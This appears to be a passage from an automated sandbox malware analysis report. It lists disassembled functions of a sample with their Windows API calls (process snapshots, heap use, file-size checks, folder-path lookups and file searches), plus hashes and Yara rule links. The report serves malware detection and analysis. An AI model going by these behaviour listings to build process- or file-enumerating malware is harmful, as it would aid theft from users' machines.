                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: b4ac2d61025fd7b5b2bd54ea8ff332c1df42f707acf9bf72bec6a613ff118ad6
                                      • Instruction ID: 111e25152f21560d4dee23410535d4ac713a69a1fc51cfa37ba3a25ffd2eedbb
                                      • Opcode Fuzzy Hash: b4ac2d61025fd7b5b2bd54ea8ff332c1df42f707acf9bf72bec6a613ff118ad6
                                      • Instruction Fuzzy Hash: DC317A71941618ABDB25EF98DC92FEEB778FF44740F104199F50AA2190DB346A48CFB1
                                      Function 00DAFDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DAFE13
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DAFE2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Value___vcrt_
                                      • String ID:
                                      • API String ID: 1426506684-0
                                      • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction ID: 08290e109a52d4a9ba570d04301f52884285a04a3c0f21d756fd13feeea68974
                                      • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction Fuzzy Hash: CC018436209721EEF63427B45CD99A73694EB027B57384379F116851F2EF514D419170
                                      Function 00D47B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00D50DE8,00000000,?), ref: 00D47B40
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D47B47
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00D50DE8,00000000,?), ref: 00D47B54
                                      • wsprintfA.USER32 ref: 00D47B83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: 5d204927fd02996992cee66553a60fcbfd702815828d6e0f05e44c8ea7a0646c
                                      • Instruction ID: 99712059399eb5722fd17bd6027679aca86b1640f43d2a6fd05fe8c70c53b086
                                      • Opcode Fuzzy Hash: 5d204927fd02996992cee66553a60fcbfd702815828d6e0f05e44c8ea7a0646c
                                      • Instruction Fuzzy Hash: 86113CB2904118ABCB25DFC9DD45BBEB7B8FB4CB11F10421AF685A2284D33D5940C7B0
                                      Function 00D49470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00D43D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00D43D3E,?), ref: 00D4948C
                                      • GetFileSizeEx.KERNEL32(000000FF,00D43D3E), ref: 00D494A9
                                      • CloseHandle.KERNEL32(000000FF), ref: 00D494B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      • Opcode ID: 513f7447382061c02ef604301a14d9c032e49ff4de8063828c8113dfcb9a2028
                                      • Instruction ID: 96cc898d4790bee4ebae124a9cbdf3ad8b765088d6bb2345fbd85403ecfeb8db
                                      • Opcode Fuzzy Hash: 513f7447382061c02ef604301a14d9c032e49ff4de8063828c8113dfcb9a2028
                                      • Instruction Fuzzy Hash: B7F0A934E00204BBD720DFB5DC54F9FB7B5AB48300F10C654F595A71C4D679A6018F54
                                      Function 00D4CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 00D4CA7E
                                        • Part of subcall function 00D4C2A0: __amsg_exit.LIBCMT ref: 00D4C2B0
                                      • __getptd.LIBCMT ref: 00D4CA95
                                      • __amsg_exit.LIBCMT ref: 00D4CAA3
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00D4CAC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 300741435-0
                                      • Opcode ID: 0d1d13c1b33c73dd78e96f73640996536e647382ac378ef8256fdd8d6408f447
                                      • Instruction ID: 8bc1737021676b3fb9fcb41a038733f74071776754b78cfdb5fde09cd0640ea0
                                      • Opcode Fuzzy Hash: 0d1d13c1b33c73dd78e96f73640996536e647382ac378ef8256fdd8d6408f447
                                      • Instruction Fuzzy Hash: 56F0BB319663149FD7A0FBF8584774E37A0EF00721F14214AF504962D2DBA499409BB5
                                      Function 00DB04D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Catch
                                      • String ID: MOC$RCC
                                      • API String ID: 78271584-2084237596
                                      • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction ID: c77ce06ad0965daebdcb932c2effdda4f101fef0b1c756e9cb5bb20344acaa65
                                      • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                      • Instruction Fuzzy Hash: 25414972900209EFDF26DF98DD81AEEBBB5FF48304F188199F90666611D3359A90DF60
                                      Function 00D45190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00D48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00D451CA
                                      • lstrcat.KERNEL32(?,00D51058), ref: 00D451E7
                                      • lstrcat.KERNEL32(?,01678F08), ref: 00D451FB
                                      • lstrcat.KERNEL32(?,00D5105C), ref: 00D4520D
                                        • Part of subcall function 00D44B60: wsprintfA.USER32 ref: 00D44B7C
                                        • Part of subcall function 00D44B60: FindFirstFileA.KERNEL32(?,?), ref: 00D44B93
                                        • Part of subcall function 00D44B60: StrCmpCA.SHLWAPI(?,00D50FC4), ref: 00D44BC1
                                        • Part of subcall function 00D44B60: StrCmpCA.SHLWAPI(?,00D50FC8), ref: 00D44BD7
                                        • Part of subcall function 00D44B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00D44DCD
                                        • Part of subcall function 00D44B60: FindClose.KERNEL32(000000FF), ref: 00D44DE2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: 6f34f381a2c3c5005a5ef6370eeba2a4711f5fb459f030b808cb25884f0d6009
                                      • Instruction ID: 57978d7f03b5edaaf40f722966eb7baf610244cb70aad65b1e32151b9b91a63b
                                      • Opcode Fuzzy Hash: 6f34f381a2c3c5005a5ef6370eeba2a4711f5fb459f030b808cb25884f0d6009
                                      • Instruction Fuzzy Hash: EA21C87A900208ABDB24FBB0DC46EED733DDB54300F004558B9D596185EE79AACC8BB1